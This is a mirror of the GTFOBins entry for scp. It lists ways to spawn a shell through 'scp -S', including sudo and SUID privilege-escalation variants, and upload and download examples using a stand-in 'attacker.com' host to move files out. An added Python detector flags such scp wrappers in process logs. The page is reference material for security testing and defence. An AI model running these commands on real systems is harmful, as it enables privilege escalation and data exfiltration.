mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-01-26 21:43:02 +01:00
8eaf595fe6
Here the trick is to restore those file descriptors (0, 1, 2) that have been redirected (`dup2`) by the parent process. First we need to determine which one has been redirected, for example by looking at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0, 1 or 2 respectively, where `x` is any file descriptor number that points to the TTY. It may happen that no file descriptor is unchanged, in that case we can use `tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
34 lines
788 B
Markdown
---
functions:
  execute-interactive:
    - code: |
        TF=$(mktemp)
        echo 'sh 0<&2 1>&2' > $TF
        chmod +x "$TF"
        scp -S $TF x y:
  upload:
    - description: Send local file to an SSH server.
      code: |
        RPATH=user@attacker.com:~/file_to_save
        LFILE=file_to_send
        scp $LFILE $RPATH
  download:
    - description: Fetch a remote file from an SSH server.
      code: |
        RPATH=user@attacker.com:~/file_to_get
        LFILE=file_to_save
        scp $RPATH $LFILE
  sudo-enabled:
    - code: |
        TF=$(mktemp)
        echo 'sh 0<&2 1>&2' > $TF
        chmod +x "$TF"
        sudo scp -S $TF x y:
  suid-limited:
    - code: |
        TF=$(mktemp)
        echo 'sh 0<&2 1>&2' > $TF
        chmod +x "$TF"
        ./scp -S $TF a b:
---
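
A detection-side check for the `scp -S` pattern used in the entries above, as an added example that is not part of the GTFOBins project: it parses process command lines (for example from execve audit records) and flags any `scp` whose `-S` program is not an ssh client. The allow-list, the function names and the sample command lines are assumptions constructed for illustration.

```python
import os
import shlex

# Assumption: the only legitimate -S program on this fleet is an ssh client.
ALLOWED_SSH_PROGRAMS = {"ssh"}
# scp options that take an argument, per scp(1) in current OpenSSH.
OPTS_WITH_ARG = set("cDFiJloPSX")

def scp_ssh_program(cmdline):
    """Return the program given to `scp -S`, or None if absent or not scp."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:  # unbalanced quotes in a truncated log line
        return None
    # Matching on the basename also covers `sudo scp` and `./scp`.
    start = next((i for i, a in enumerate(argv)
                  if os.path.basename(a) == "scp"), None)
    if start is None:
        return None
    args = iter(argv[start + 1:])
    for tok in args:
        if tok == "--":
            break
        if not tok.startswith("-") or tok == "-":
            continue  # operand; keep scanning to stay conservative
        for pos, ch in enumerate(tok[1:], start=2):
            rest = tok[pos:]  # text following this option letter
            if ch == "S":
                return rest or next(args, None)  # handles -Sprog and -S prog
            if ch in OPTS_WITH_ARG:
                if not rest:
                    next(args, None)  # value is the next token; skip it
                break
    return None

def flag_scp_wrappers(cmdlines):
    """Return (cmdline, program) pairs where -S is not an allowed ssh client."""
    hits = []
    for line in cmdlines:
        prog = scp_ssh_program(line)
        if prog is not None and os.path.basename(prog) not in ALLOWED_SSH_PROGRAMS:
            hits.append((line, prog))
    return hits

# Constructed sample command lines, not captured from a real system.
SAMPLE_CMDLINES = [
    "scp -S /tmp/tmp.Xa12 x y:",
    "sudo scp -S /tmp/tmp.Xa12 x y:",
    "scp -P 2222 -i key report.txt backup@host.example:",
    "scp -o StrictHostKeyChecking=yes -S /usr/bin/ssh a b:",
    "scp -qS/tmp/wrap a b:",
]
```

Pairing this with a review of sudoers rules and SUID bits that grant `scp` covers the `sudo-enabled` and `suid-limited` cases, where the `-S` program runs with the elevated identity.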